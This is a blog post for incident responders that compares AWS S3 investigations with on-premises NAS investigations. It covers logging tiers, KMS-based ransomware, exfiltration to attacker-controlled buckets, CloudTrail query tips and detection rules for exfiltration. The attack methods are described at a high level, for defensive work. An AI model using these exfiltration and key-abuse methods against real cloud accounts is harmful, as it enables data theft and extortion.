Aren't AWS Cloud Investigations the same as On-Prem?

Introduction

As always, if this is your first time visiting my page, welcome! If you're coming back for more, I do have vouchers to a good clinic I could recommend (just kidding). I'm excited to continue the next post in the mini-series detailing the overlap, but more importantly the differences, in AWS Cloud investigations versus on-premises. In this blog post, we will be diving into AWS S3 this time, which is a beast, so let's skip the rest of the intro.

What is S3?

Airlifted directly from the AWS docs, "Amazon Simple Storage Service (Amazon S3) is an object storage service that offers industry-leading scalability, data availability, security, and performance." AWS S3 is arguably (or not) one of the most popular AWS services ever released and is commonly used to host static website content. It is also used, as the documentation refers to it, object storage. With this in mind, the counterpart technology here would be a NAS (Network Attached Storage). I found it ironic and useful that AWS has documentation dedicated to what a NAS device is, how they work & different types that exist. However, I want to focus on a couple key differences between S3 & NAS that show up in their architecture, authentication/access, logging and the threats you'll face.

Architecture Difference

Not going to spend too much time here (though I probably should) as there is a fair amount of confusion around whether S3 is a hierarchical file system. The short answer is no, and the longer answer is:

Jokes aside, one key point to take away is that the S3 Console in the AWS portal is misleading in that the files are presented to you as if the objects are truly hierarchical but this is for ease of use and visual consumption. In reality, these objects exist in a flat namespace, literally in a digital bucket. If you were to change permissions at the bucket level, this is independent of object-level permissions within the bucket.

Looks like NTFS, but it's not. If you think I am lying to you, try renaming a file or "folder" in S3. You can't, can you? You have to copy the new object (file) and/or rename the folder and remove all previous versions. If you made the assumption that S3 was the same as a traditional filesystem and were misled by the UI, I will offer my apologies on behalf of AWS, though they never stated it was a filesystem.

S3 Filesystem Illusion (generated using ChatGPT)

This aside, S3 is one of the most widely used cloud-based file storage services and powers a significant share of the public internet to my knowledge, so it is important to know these differences to better prepare yourself for the battle of cloud investigations. Why does knowing file system differences matter to a Cloud Incident Responder/Investigator?

Well, there are many examples I could give but here is one that may grab your attention. AWS has done a great job in reducing the likelihood or at least the ease of creating public S3 buckets but if you're not enforcing private buckets at the account level, this is still not difficult. As I mentioned above, the objects are in a flat namespace, any individual object underneath a bucket can be made public regardless of the permissions of the "parent folder" above it or any neighbor objects that would appear in the same "folder". It is best not to assume anything based off the bucket permissions or access changes performed at the bucket-level.

I will add this and move on (because we have more to talk about 😅), in traditional on-premises environments, you pretty much never have to worry about a threat actor enumerating your file system(s) externally against your NAS devices, presuming the NAS itself is not sitting directly on the internet. Well, even if your buckets are "private", meaning they are not intentionally public, your bucket names can still be enumerated and discovered by a threat actor abusing the fact that S3 bucket names have to be globally unique. This topic has been covered by other researchers and bloggers, so you can find more on this tactic here.

Authentication & Access

This is another topic that would take longer than our current attention span to do justice, but it is important to note that because AWS IAM is such a complex service, it allows for far more granular control over a file (object) than traditional file systems such as NTFS or Unix file systems. This includes granular controls such as dictating the source IP address from which a given IAM principal is or is not allowed to call actions like DeleteBucket or PutObject, for example. Now, an obvious difference for a shared file system technology such as a NAS and S3 is that a NAS would generally use SMB for file access, typically integrated with Active Directory, or NFS via LDAP in an enterprise environment.

Why do I bring this up? Well, you would need to authenticate as a valid user generally to interact with files hosted on a NAS device. In S3, access to objects is typically authenticated using IAM credentials (IAM User, Role)...unless you don't need to "authenticate". As discussed earlier in this series, compromised credentials are already signed, allowing an attacker to do damage without a traditional "login" process typically associated with an on-premises domain. Because S3 access occurs over HTTPS, this activity can originate from anywhere in the world. If you have not spent the time to secure your data perimeter, which is not an easy feat for medium to large sized enterprises, this access can happen unknowingly and right under your nose. This brings me to the next difference which cuts both ways (for and against you), logging!

Logging

NAS logging will depend on the vendor but in general, it is not as robust in comparison to the available logging for S3. S3 logging is done in three different tiers which offer varying levels of visibility. AWS CloudTrail logs S3 management events by default, but this gives you the lowest amount of visibility as it is primarily operations that occurred at the bucket-level. To put it simply, you'd be forced to tell your lawyers that you must assume the threat actor exfiltrated all the objects in all the buckets they had permissions to list because you wouldn't be able to prove what they did access. On the other hand, S3 Data events would allow you to know what is happening at the object-level and provide you with the evidence that you would need to confidently state what your data access exposure was or was not. This gives defenders a tremendous leg up but it most certainly comes at a cost...

I pray one day this changes (👀looking at any AWS employees reading this blog for some reason) but for now, AWS charges approximately $0.10 per 100,000 data events delivered. This sounds cheap but when you consider the average organization and the scale of API operations across thousands of buckets, you realize this is insanely expensive. Also, from my experience in "hallway chats" with peers across different industries, many do not foot the bill for these logs, which leaves them with many unanswered questions in the thick of an investigation.

There is a tier beyond data events and it is actually free to enable, you just pay for the storage and any additional plumbing you utilize. S3 server access logging is in my opinion better tailored for externally facing buckets but it would get you most of what you need for an investigation as it provides useful context similar to HTTP server access style logging. The one caveat is that it is a "best-effort" log source unlike CloudTrail that has an service-level agreement. Regardless, I think if you find yourself needing more than just management events (which we pretty much all fit into this group), you will at least want to enable Data events or server access logs on select buckets.

The HTTP style logging will likely be familiar to my on-premises brethren (been a while since I've used that word), so the server access logs will be your friend. I stated in the last blog post, but AWS CloudTrail is by far the cleanest and most consistent cloud logging format that exists across the cloud service providers in my humble opinion and will certainly help you in your broader investigations when querying this dataset. That probably won't matter to your billing department but if you need another reason to convince your leadership team why you need S3 Data Events, consistency of the logging scheme, log delivery SLA and more importantly, your ability to answer their questions during an incident will go a long way for incident responders and detection engineers.

Threats

The threats that you face aren't necessarily different for on-prem. The one that everyone cares about nowadays is ransomware so let's just use that as the base threat concern. In the NAS world, this would likely come from abusing Active Directory in some way to gain lateral movement and/or finessing your way to an SMB share and then deploying malware to encrypt "all the things" after they've been exfiltrated to the attacker's environment. It is important to understand that this buildup from an initially compromised account to target account used for ransomware deployment is going take a lot longer on-premises than in the cloud.

In S3, the "crossover" (referenced in Part 1) effectively accomplishes both. Worded differently, it eliminates the need for both lateral movement and elevating your privileges to get access to the S3 buckets you need, depending on the identity that has been compromised. This isn't wildly different than on-premises but the method(s) of encryption or "ransomware" in S3 can look very different. You'd be shocked how many organizations are not properly protecting access to the keys of their kingdom and instead leaving them under the doormat. The attacker could just go after the encryption (KMS) keys that you are using to protect your objects in S3 and change key policies to grant themselves, or no one at all, the ability to use those keys. There are many options and this blog does a good job of highlighting a number of them. That said, it would be more likely for the attacker to bring their own encryption keys (similar to on-prem) and encrypt your bucket/objects with an attacker controlled key.

If they wanted to exfiltrate files using the S3 service, the commands themselves are very simple and cannot be blocked by custom-managed network firewalls you brought to the cloud as S3 will be transferring those files to an attacker-controlled S3 bucket all on the AWS internet backbone. I want to stress how easy it is to exfiltrate data out of your cloud environment in comparison to an on-premises version of this procedure. Normally, you'd have to download the stolen files to a staged area and maybe compress them into a zip file (not required but very likely) prior to shipping them to the attacker's C2 server. All of this activity would be apparent in netflow data and certainly firewall logging...if you're looking that is. In AWS cloud environments, you can simply create a script that utilizes the AWS CLI similar to what is shown in this Hacking The Cloud post. This would allow you to rip through thousands of objects and accomplish both staging and exfiltration using the native AWS S3 service that also can encrypt these files at the same time all the while evading traditional firewall and certainly DLP capabilities that may exist in your non-cloud environment(s).

On-Prem vs. AWS S3 Exfiltration Flow (generated using ChatGPT)

What does this mean for IR?

You will need to move faster in gaining an understanding of what was done with the compromised credential(s) than blast-radius type investigative tasks, at least initially. I find it better to assume the AWS principal can access everything and work backward from there.

Here are my tips/advice to keep in mind during S3 investigations:

Known compromised AWS Access Key IDs (permanent and/or temporary) are your friends in AWS CloudTrail log queries. Focus on these keys and filter to the userIdentity.accessKeyId and hone in on your API eventNames of interest. These could include (but certainly not limited to):

s3 - CopyObject
s3 - GetObject
s3 - PutObject
s3 - PutBucketEncryptionConfiguration
s3 - PutBucketPolicy
kms - CreateKey
kms - Encrypt
kms - PutKeyPolicy

Aggregate on fields requestParameters.bucketName and requestParameters.key to answer data access questions at scale.
Once you have some idea on what they may have accessed, then worry about what else they could touch. The primary reason is the speed of the cloud which takes away your luxury to do typical on-prem investigative tasks such as worry about blast radius while concurrently looking into what took place.

Going back to the exfiltration aspect of your investigation, normally you'd go straight to the NetFlow or firewall logs to try to understand C2 and spikes in network volume. That will not help you or even exist here, there are no network traffic logs to find (at least not from the customer side, I would be very curious to know if AWS has this information but they'd never tell anyone). The primary thing that will help you here is AWS CloudTrail logs and specifically, data events, server access logs and/or management events, whichever you have, but in that order.

I do not blame anyone for not having S3 Data events because AWS has made these pretty costly (and it would be great if these became a fraction of the current cost) but at the very least you should have S3 server access logs enabled. Regardless, these are the data sources that can tell you everything about the data being yeeted across the AWS internet at light speed, right into their new home (the attacker's bucket). So do yourself a favor and arm yourself with the evidence to know which door you will need a warrant to knock down.

Detection Signals

What detection signals can really help you in your investigations? Sadly for S3, GuardDuty is probably going to be your only common savior and specifically this finding for anomalous exfiltration behavior. Building quality detections on your own generally require the data events as the management events alone are not good enough. Even so, this is fairly expensive, not only due to ingestion and storage of the data but the computation cost to run detection rulesets against that volume of data.

This is an area where vendors in the CSPM/CNAPP space such as Wiz, Datadog, Sysdig and others are really going to be able to help you as this is not an easy problem to solve. Unlike on-premises, where you can write detections that are based on SMB access and have good fidelity, the fact is that in the cloud, these API operations in S3 are happening at high volume and are expected. This means, picking out anomalous GetObject operations, becomes a very expensive and no doubt, a high false-positive battle. CNAPP vendors that can utilize your raw cloud telemetry can help you in ways that are extremely expensive to replicate in-house.

That said, here are some custom detections that can help you detect use-cases of interest:

S3 Browser Usage

Logic: Sigma Example 1, Example 2 & Example 3
Severity: Medium
Value Prop: S3 Browser may be used in your environment but realistically it should be controlled and at least used within expected IP ranges. Anything outside of that should be considered malicious

S3 Write Events to Unknown Buckets

Logic: PutObject or CopyObject events destine for S3 buckets that are not in your inventory
Severity: High
Value Prop: I presume you want to know about exfiltration to external S3 buckets
Caveat: You'd need a dynamic list of your managed S3 buckets and your vendors'

AWS Principal Error Volume

Logic: Aggregate by AWS Principal (userIdentity.arn) and calculate distinct # of errorCodes and eventSources

The key is > 3-5 AWS services and > 10 errors

Severity: Low
Value Prop: This is low severity but boy does it help when trying to understand if intentional enumeration occurred before the really bad thing happened
Caveat: You'll need a list of your CSPM/inventory type services that perform enumeration as they are common false positive offenders

Conclusion

You may have picked up that the S3 comparison to on-prem NAS and its threats aren't too different. It's the details that end up mattering the most. Unlike on-prem, you will not get the time you think to focus on "what can this thing (identity) do?" and will have your hands full with "what did they do?". The details of how a threat actor can use the S3 or KMS service against you, will be hard enough for the IR team, assuming you have good enough logging available to query.

In 2026, you will need the help of a modern CNAPP to give your incident response, detection engineers and cloud security teams any realistic shot at securing and investigating their cloud environment. Remember the old phrase: "To be early is to be on time, to be on time is to be late, to be late is to be forgotten". Well, if you think you can wait until the incident happens to turn on S3 Data/server access logging, or after your major incident to grab your purse to pay for a decent CNAPP vendor...your organization will NOT be forgotten...in the headlines. These cloud incidents move too fast and you sometimes need to make very complex correlations to get the answers that will be asked by enterprise leadership. Trying to do all of that by hand is laughable and is impossible without the necessary logging.

Do your Security Ops teams a favor and do the right thing early.

Search This Blog

Le Bron Does Security?